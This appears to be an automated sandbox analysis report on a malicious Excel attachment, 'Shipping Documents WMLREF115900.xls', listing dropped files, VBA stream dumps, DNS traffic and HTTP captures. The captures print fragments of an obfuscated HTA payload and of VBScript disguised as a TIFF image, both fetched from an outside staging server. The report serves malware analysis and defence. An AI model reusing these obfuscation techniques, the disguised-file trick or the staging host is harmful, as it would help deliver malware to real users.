C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethebestthingstobegoodwithhislifebestthigns[1].hta

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\goodthingswithgreatcomebackwithgreatthigns[1].tiff

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3C3140CD.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A3B4F527.emf

C:\Users\user\AppData\Local\Temp\0kghrs1a.fgj.ps1

C:\Users\user\AppData\Local\Temp\14qy4tzd.pbk.psm1

C:\Users\user\AppData\Local\Temp\1yj1uz5t.cmk.ps1

C:\Users\user\AppData\Local\Temp\41k31je4\41k31je4.0.cs

C:\Users\user\AppData\Local\Temp\41k31je4\41k31je4.cmdline

C:\Users\user\AppData\Local\Temp\41k31je4\41k31je4.dll

C:\Users\user\AppData\Local\Temp\41k31je4\41k31je4.out

C:\Users\user\AppData\Local\Temp\41k31je4\CSC1CC2DACCE81D4F99A1AD504B85F71256.TMP

Windows Analysis Report
Shipping Documents WMLREF115900.xls

General
Stream Path:	_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
CLSID:
File Type:	data
Stream Size:	2644
Entropy:	3.984941962751876
Base64 Encoded:	False
Data ASCII:	a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
Data Raw:	cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00

General
Stream Path:	_VBA_PROJECT_CUR/VBA/dir
CLSID:
File Type:	data
Stream Size:	553
Entropy:	6.356559220010791
Base64 Encoded:	True
Data ASCII:	. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . + i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
Data Raw:	01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 03 e2 2b 69 12 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 24, 2024 08:45:22.435332060 CEST	54562	53	192.168.2.22	8.8.8.8
Oct 24, 2024 08:45:22.443413973 CEST	53	54562	8.8.8.8	192.168.2.22
Oct 24, 2024 08:45:25.198833942 CEST	52917	53	192.168.2.22	8.8.8.8
Oct 24, 2024 08:45:25.220220089 CEST	53	52917	8.8.8.8	192.168.2.22
Oct 24, 2024 08:45:39.850053072 CEST	62751	53	192.168.2.22	8.8.8.8
Oct 24, 2024 08:45:39.879537106 CEST	53	62751	8.8.8.8	192.168.2.22
Oct 24, 2024 08:45:41.528641939 CEST	57893	53	192.168.2.22	8.8.8.8
Oct 24, 2024 08:45:41.544504881 CEST	53	57893	8.8.8.8	192.168.2.22
Oct 24, 2024 08:45:44.406956911 CEST	54821	53	192.168.2.22	8.8.8.8
Oct 24, 2024 08:45:44.414830923 CEST	53	54821	8.8.8.8	192.168.2.22
Oct 24, 2024 08:45:44.417562962 CEST	54821	53	192.168.2.22	8.8.8.8
Oct 24, 2024 08:45:44.425565958 CEST	53	54821	8.8.8.8	192.168.2.22
Oct 24, 2024 08:45:59.794780970 CEST	54719	53	192.168.2.22	8.8.8.8
Oct 24, 2024 08:45:59.803519964 CEST	53	54719	8.8.8.8	192.168.2.22
Oct 24, 2024 08:46:01.556329012 CEST	49881	53	192.168.2.22	8.8.8.8
Oct 24, 2024 08:46:01.572320938 CEST	53	49881	8.8.8.8	192.168.2.22
Oct 24, 2024 08:46:01.576849937 CEST	49881	53	192.168.2.22	8.8.8.8
Oct 24, 2024 08:46:01.585191965 CEST	53	49881	8.8.8.8	192.168.2.22

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 08:45:23.997997999 CEST	375	OUT	GET /36/bv/seethebestthingstobegoodwithhislifebestthigns.hta HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 192.3.176.141 Connection: Keep-Alive
Oct 24, 2024 08:45:24.692682028 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 06:45:23 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Thu, 24 Oct 2024 00:44:54 GMT ETag: "20a04-6252e4f9e216e" Accept-Ranges: bytes Content-Length: 133636 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/hta Data Raw: 3c 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 22 25 33 43 73 63 72 69 70 74 25 32 30 6c 61 6e 67 75 61 67 65 25 33 44 4a 61 76 61 53 63 72 69 70 74 25 33 45 6d 25 33 44 25 32 37 25 32 35 33 43 73 63 72 69 70 74 25 32 35 32 30 6c 61 6e 67 75 61 67 65 25 32 35 33 44 4a 61 76 61 53 63 72 69 70 74 25 32 35 33 45 6d 25 32 35 33 44 25 32 35 32 37 25 32 35 32 35 33 43 25 32 35 32 35 32 31 44 4f 43 54 59 50 45 25 32 35 32 35 32 30 68 74 6d 6c 25 32 35 32 35 33 45 25 32 35 32 35 30 41 25 32 35 32 35 33 43 6d 65 74 61 25 32 35 32 35 32 30 68 74 74 70 2d 65 71 75 69 76 25 32 35 32 35 33 44 25 32 35 32 35 32 32 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 25 32 35 32 35 32 32 25 32 35 32 35 32 30 63 6f 6e 74 65 6e 74 25 32 35 32 35 33 44 25 32 35 32 35 32 32 49 45 25 32 35 32 35 33 44 45 6d 75 6c 61 74 65 49 45 38 25 32 35 32 35 32 32 25 32 35 32 35 32 30 25 32 35 32 35 33 45 25 32 35 32 35 30 41 25 32 35 32 35 33 43 68 74 6d 6c 25 32 35 [TRUNCATED] Data Ascii: <script>...document.write(unescape("%3Cscript%20language%3DJavaScript%3Em%3D%27%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatible%252522%252520content%25253D%252522IE%25253DEmulateIE8%252522%252520%25253E%25250A%25253Chtml%25253E%25250A%25253Cbody%25253E%25250A%25253CscRiPT%252520TYpE%25253D%252522TexT/vBscrIpt%252522%25253E%25250ADiM%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525
Oct 24, 2024 08:45:24.692734003 CEST	1236	IN	Data Raw: 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 Data Ascii: 09%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25
Oct 24, 2024 08:45:24.692785025 CEST	424	IN	Data Raw: 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 Data Ascii: 52509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509
Oct 24, 2024 08:45:24.692820072 CEST	1236	IN	Data Raw: 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 6a 74 4a 55 4e 52 64 48 58 64 64 47 6c 50 76 6e 47 59 63 6c 76 53 58 69 58 75 66 48 55 4d 51 72 Data Ascii: 9%252509%252509%252509%252509%252509%252509%252509jtJUNRdHXddGlPvnGYclvSXiXufHUMQrzikApbWIejoDTAruyOIlXMSKIuKatFvfCVifgINdpnNRNPMuXTKiTHYQSlfiKgmwinDFzTdnuYFsgRgIUUlXALRWpAtbjyQMfSwVKRtHhZPcoPbEczlAggZxOVAAdQKvitRWbKnHqYtPzQaGkqNLZZYOffCAJquTg
Oct 24, 2024 08:45:24.692852974 CEST	1236	IN	Data Raw: 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 Data Ascii: %252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525
Oct 24, 2024 08:45:24.692886114 CEST	1236	IN	Data Raw: 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 Data Ascii: 509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2
Oct 24, 2024 08:45:24.692922115 CEST	1236	IN	Data Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
Oct 24, 2024 08:45:24.692964077 CEST	1236	IN	Data Raw: 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 Data Ascii: 52509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509
Oct 24, 2024 08:45:24.693002939 CEST	1096	IN	Data Raw: 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 Data Ascii: 9%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252
Oct 24, 2024 08:45:24.693046093 CEST	1236	IN	Data Raw: 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 Data Ascii: 2509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%
Oct 24, 2024 08:45:24.698542118 CEST	1236	IN	Data Raw: 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 Data Ascii: %252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 08:45:26.735239983 CEST	452	OUT	GET /36/bv/seethebestthingstobegoodwithhislifebestthigns.hta HTTP/1.1 Accept: / Accept-Language: en-US UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Range: bytes=8896- Connection: Keep-Alive Host: 192.3.176.141 If-Range: "20a04-6252e4f9e216e"
Oct 24, 2024 08:45:27.389779091 CEST	1236	IN	HTTP/1.1 206 Partial Content Date: Thu, 24 Oct 2024 06:45:26 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Thu, 24 Oct 2024 00:44:54 GMT ETag: "20a04-6252e4f9e216e" Accept-Ranges: bytes Content-Length: 124740 Content-Range: bytes 8896-133635/133636 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/hta Data Raw: 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 [TRUNCATED] Data Ascii: 9%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25253A%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509
Oct 24, 2024 08:45:27.389837980 CEST	1236	IN	Data Raw: 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 Data Ascii: %252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525
Oct 24, 2024 08:45:27.389909029 CEST	1236	IN	Data Raw: 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 Data Ascii: 509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2
Oct 24, 2024 08:45:27.389930010 CEST	1236	IN	Data Raw: 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 Data Ascii: 09%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25
Oct 24, 2024 08:45:27.389967918 CEST	1236	IN	Data Raw: 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 Data Ascii: 52509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509
Oct 24, 2024 08:45:27.389986992 CEST	1096	IN	Data Raw: 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 Data Ascii: 2509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%
Oct 24, 2024 08:45:27.390022993 CEST	1236	IN	Data Raw: 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 Data Ascii: %252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525
Oct 24, 2024 08:45:27.390041113 CEST	1236	IN	Data Raw: 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 Data Ascii: 509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2
Oct 24, 2024 08:45:27.390059948 CEST	1236	IN	Data Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
Oct 24, 2024 08:45:27.390081882 CEST	1236	IN	Data Raw: 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 Data Ascii: %252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525
Oct 24, 2024 08:45:27.395416021 CEST	848	IN	Data Raw: 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 32 38 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 Data Ascii: 509%252509%252509%252528%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 08:45:33.740700960 CEST	369	OUT	GET /36/goodthingswithgreatcomebackwithgreatthigns.tIF HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 192.3.176.141 Connection: Keep-Alive
Oct 24, 2024 08:45:34.428013086 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 06:45:33 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Thu, 24 Oct 2024 00:28:17 GMT ETag: "22272-6252e1433ac91" Accept-Ranges: bytes Content-Length: 139890 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/tiff Data Raw: ff fe 70 00 72 00 69 00 76 00 61 00 74 00 65 00 20 00 66 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 43 00 72 00 65 00 61 00 74 00 65 00 53 00 65 00 73 00 73 00 69 00 6f 00 6e 00 28 00 77 00 73 00 6d 00 61 00 6e 00 2c 00 20 00 63 00 6f 00 6e 00 53 00 74 00 72 00 2c 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2c 00 20 00 65 00 73 00 74 00 61 00 6d 00 62 00 72 00 65 00 69 00 72 00 6f 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 61 00 70 00 6f 00 75 00 63 00 61 00 64 00 6f 00 46 00 6c 00 61 00 67 00 73 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 63 00 6f 00 6e 00 4f 00 70 00 74 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 61 00 70 00 6f 00 75 00 63 00 61 00 64 00 6f 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 61 00 75 00 74 00 68 00 56 00 61 00 6c 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 65 00 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 56 00 61 00 6c 00 0d 00 0a 00 20 00 20 00 20 00 20 00 [TRUNCATED] Data Ascii: private function CreateSession(wsman, conStr, optDic, estambreiro) dim apoucadoFlags dim conOpt dim apoucado dim authVal dim encodingVal dim encryptVal dim pw dim tout ' proxy information dim proxyAccessType dim proxyAccessTypeVal dim proxyAuthenticationMechanism dim proxyAuthenticationMechanismVal dim proxyUsername dim proxyPassword apoucadoFlags = 0 proxyAccessTy
Oct 24, 2024 08:45:34.428044081 CEST	212	IN	Data Raw: 00 70 00 65 00 20 00 3d 00 20 00 30 00 0d 00 0a 00 20 00 20 00 20 00 20 00 70 00 72 00 6f 00 78 00 79 00 41 00 63 00 63 00 65 00 73 00 73 00 54 00 79 00 70 00 65 00 56 00 61 00 6c 00 20 00 3d 00 20 00 30 00 0d 00 0a 00 20 00 20 00 20 00 20 00 70 Data Ascii: pe = 0 proxyAccessTypeVal = 0 proxyAuthenticationMechanism = 0 proxyAuthenticationMechanism
Oct 24, 2024 08:45:34.428060055 CEST	1236	IN	Data Raw: 00 56 00 61 00 6c 00 20 00 3d 00 20 00 30 00 0d 00 0a 00 20 00 20 00 20 00 20 00 70 00 72 00 6f 00 78 00 79 00 55 00 73 00 65 00 72 00 6e 00 61 00 6d 00 65 00 20 00 3d 00 20 00 22 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 70 00 72 00 6f 00 78 Data Ascii: Val = 0 proxyUsername = "" proxyPassword = "" set conOpt = Nothing if optDic.ArgumentExists(N
Oct 24, 2024 08:45:34.428076029 CEST	1236	IN	Data Raw: 00 20 00 20 00 20 00 20 00 20 00 20 00 27 00 20 00 49 00 6e 00 76 00 61 00 6c 00 69 00 64 00 21 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 41 00 53 00 53 00 45 00 52 00 54 00 42 00 4f 00 4f Data Ascii: ' Invalid! ASSERTBOOL false, "The specified encoding flag is invalid." end if end if
